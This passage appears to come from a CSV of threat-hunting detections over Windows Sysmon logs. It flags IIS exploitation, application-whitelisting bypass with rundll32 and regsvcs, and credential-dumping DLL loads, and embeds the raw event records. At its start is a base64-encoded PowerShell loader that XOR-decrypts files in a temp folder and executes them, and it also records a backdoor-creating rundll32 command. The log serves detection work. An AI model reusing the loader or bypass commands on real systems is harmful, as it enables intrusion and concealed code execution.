JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==) and Parent Image :C:\Windows\System32\inetsrv\w3wp.exe , Parent CommandLine (c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20) in directory : ( C:\Windows\Temp\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5875 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:28:42.700 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-3251-5CEB-0000-00109E06E100 + 748 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + 
+",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 20 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:13.560 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\hid.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Hid User Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Detect IIS/Exchange Exploitation,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) and commandline ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5875 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:28:42.700 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + 
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-3251-5CEB-0000-00109E06E100 + 748 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243544 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.077 + 747F3D96-9F69-5E75-0000-0010476F2000 + 7836 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( 
"C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16507 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:09:02.275 + 365ABB72-532E-5CD8-0000-00106C222700 + 1528 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 20 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:13.560 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\hid.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Hid User Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational 
+[T1086] PowerShell Process found,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5875 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:28:42.700 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-3251-5CEB-0000-00109E06E100 + 748 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243544 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + 
+ + + + 2020-03-21 05:00:25.077 + 747F3D96-9F69-5E75-0000-0010476F2000 + 7836 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16507 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:09:02.275 + 365ABB72-532E-5CD8-0000-00106C222700 + 1528 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + 
"C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243544 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.077 + 747F3D96-9F69-5E75-0000-0010476F2000 + 7836 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16507 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:09:02.275 + 365ABB72-532E-5CD8-0000-00106C222700 + 1528 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" 
pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436010.074656,2019-07-30T01:33:30.074656+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4920 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:28.893 + 747F3D96-6628-5D3F-0000-0010349B8800 + 6552 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 19 + + + + + Microsoft-Windows-Sysmon/Operational 
+ IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:13.309 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\samlib.dll + 6.1.7601.23677 (win7sp1_ldr.170209-0600) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 19 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:13.309 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\samlib.dll + 6.1.7601.23677 (win7sp1_ldr.170209-0600) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556380673.931363,2019-04-27T19:57:53.931363+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /A ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6594 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + 
technique_id=T1059,technique_name=Command-Line Interface + 2019-04-27 15:57:53.806 + 365ABB72-7C01-5CC4-0000-00105C5C0C00 + 3076 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /A + C:\Users\IEUser\AppData\Roaming\ + IEWIN7\IEUser + 365ABB72-7AB1-5CC4-0000-0020BEF40000 + 0xf4be + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-7C01-5CC4-0000-0010F9530C00 + 2992 + C:\Users\IEUser\AppData\Roaming\NvSmart.exe + "C:\Users\IEUser\AppData\Roaming\NvSmart.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.43237,2019-05-27T05:29:18.432370+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5925 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.392 + 365ABB72-3D6E-5CEB-0000-00100C96FF00 + 3136 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558633564.671625,2019-05-23T21:46:04.671625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1025 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 17:45:34.528 + 365ABB72-DC3E-5CE6-0000-00102BC97200 + 712 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-CE6D-5CE6-0000-00109E190100 + 1472 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558630149.576625,2019-05-23T20:49:09.576625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 896 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 16:49:08.258 + 365ABB72-CF04-5CE6-0000-001010F20C00 + 4056 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + c:\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + 
